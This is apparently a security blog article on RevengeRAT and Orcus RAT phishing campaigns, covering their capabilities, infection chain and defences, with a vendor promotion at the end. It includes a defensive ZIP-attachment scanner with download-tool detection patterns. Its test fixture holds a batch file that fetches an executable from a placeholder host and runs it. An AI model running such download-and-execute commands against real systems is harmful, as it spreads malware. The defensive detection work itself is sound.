A threat actor has been found to leverage two popular remote access trojans, RevengeRAT and Orcus RAT, in attacks against organizations across several sectors. The trojans are being used to target financial services, government entities, information technology service providers and consultancies.
There are many variations of the infection process associated with the distribution of this malware, but most of the attacks are carried out through phishing emails.
Multiple malicious campaigns have been spotted actively targeting government and financial entities around the world, backdooring their victims' computers with the Revenge and Orcus Remote Access Trojans (RATs).
What is RevengeRAT?
RevengeRAT, also known as Revetrat, is a high-risk remote access trojan. This malware is designed to give cyber criminals remote access to the infected machine so they can manipulate it. Attackers proliferate the infection through spam email campaigns carrying malicious MS Office attachments. If a trojan-type infection such as RevengeRAT is installed on a computer, it can cause a range of problems.
RATs allow threat actors to remotely manipulate infected machines. Through this trojan, attackers can manage system processes, edit Windows Registry entries and the hosts file, steal account credentials, log keystrokes, access hardware, execute shell commands and more.
Modifications made to the system can degrade its performance, and recovery can be very difficult. Additionally, by logging keystrokes and stealing account credentials, cyber criminals can cause serious privacy issues.
Threat actors aim to generate as much revenue as possible. The stolen information can be misused in various ways: direct money transfers, borrowing money from the victim's contacts, online purchases and so on.
RevengeRAT also allows the execution of shell commands, which can lead to full system control. Shell commands are used to cause chain infections by injecting further malware into the system; RATs such as RevengeRAT are typically used to proliferate infections with different capabilities. RevengeRAT poses a significant threat to the safety of a computer and should be eliminated immediately.
What is Orcus RAT?
Orcus is a Remote Access Trojan used to remotely control or access computers. Cyber attackers trick users into installing it and then use it to steal information.
It can disable the webcam activity light, retrieve passwords from applications and browser cookies, record sound through the microphone, log keystrokes and more. This RAT is promoted on a hacking forum where people buy and sell malicious programs, hacks, exploits and the like.
Cyber attackers use spam emails to lure people into installing this tool. These emails include attachments that, when downloaded and opened, install Orcus.
Once installed, the tool can steal passwords and other sensitive and confidential details. Some of its plugins can download files, including other computer infections such as ransomware. Installing this tool can result in privacy issues, financial loss, further computer infections and other serious problems.
How does this phishing attack work?
The threat actor groups behind these attacks use a fileless attack technique to gain persistence on targeted systems and evade detection. The attackers use the SendGrid email delivery service to redirect victims to an attacker-controlled malware distribution server.
The adversary later modified the infection process by adding ZIP archive attachments to these emails. Although the emails featured the same themes, they no longer leveraged SendGrid URLs. The attached ZIP archives contain malicious batch files that retrieve a malicious PE32 file and execute it, infecting the system.
These emails impersonate various authorities, including the Better Business Bureau (BBB), the Ministry of Business, Innovation & Employment (MBIE), the Australian Competition & Consumer Commission (ACCC) and other regional agencies.
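As an added example (not code from the original article), a mail-gateway triage routine that inspects a ZIP attachment for the pattern described above: a batch file that downloads a PE and then executes it. The archive contents, file names and URL below are constructed for the demonstration.

```python
import io
import re
import zipfile

# Extensions Windows runs directly when a user double-clicks them.
SCRIPT_EXTENSIONS = (".bat", ".cmd")

# Download and execute indicators. Either alone is weak evidence; the
# campaign pattern (batch file fetches a PE32 and runs it) is the pair.
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"downloadfile", r"downloadstring",
    r"bitsadmin\s+/transfer", r"certutil\s+-urlcache", r"\bcurl\b", r"\bwget\b",
]
EXECUTE_PATTERNS = [r"\bstart\b", r"\.exe\b"]

def scan_zip_attachment(data: bytes) -> dict:
    """Inspect a ZIP attachment (raw bytes) and return a verdict with reasons."""
    scripts, findings = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            scripts.append(info.filename)
            text = zf.read(info).decode("utf-8", errors="replace").lower()
            downloads = any(re.search(p, text) for p in DOWNLOAD_PATTERNS)
            executes = any(re.search(p, text) for p in EXECUTE_PATTERNS)
            if downloads and executes:
                findings.append(f"{info.filename}: downloads and executes a file")
            elif downloads:
                findings.append(f"{info.filename}: downloads a file")
    return {"script_files": scripts, "findings": findings,
            "suspicious": bool(findings)}

def build_sample_zip() -> bytes:
    """Constructed sample mirroring the campaign: a batch file that fetches and runs a PE."""
    bat = ('@echo off\r\n'
           'powershell -Command "Invoke-WebRequest http://example.invalid/n.exe '
           '-OutFile %TEMP%\\notice.exe"\r\n'
           'start %TEMP%\\notice.exe\r\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Complaint_Notice.bat", bat)
    return buf.getvalue()

def build_benign_zip() -> bytes:
    """Constructed control: an archive with only a document, no scripts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Notice.pdf", b"%PDF-1.4 constructed placeholder")
    return buf.getvalue()
```

A gateway would quarantine any attachment for which `suspicious` is true and keep the `findings` list as the analyst's starting point for the log correlation recommended below.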
What can be done to evade such Phishing attacks?
It is important to keep an eye on the latest technologies and emerging cyber threats; however, attackers will always find a way to deploy cyber-attacks.
Store and analyse logs so that the point where an infection started can be traced and the steps the organization took to remediate it can be tracked.
Domain protection helps prevent phishing through the automated use of email authentication, and it can also protect against fraud. It maintains email governance by analysing, updating and actioning against the misuse of domains to send malicious email.
Organizations should ensure that cyber threat awareness and security best practices are carried out on a regular basis. Cyber security training helps employees build habits such as not clicking on links or downloading files that appear suspicious.
With the help of the cyber security attack simulator and awareness tool ThreatCop, organizations can ensure that employees are well prepared to fend off cyber-attacks including phishing, ransomware, vishing, smishing, the risk of removable media and more.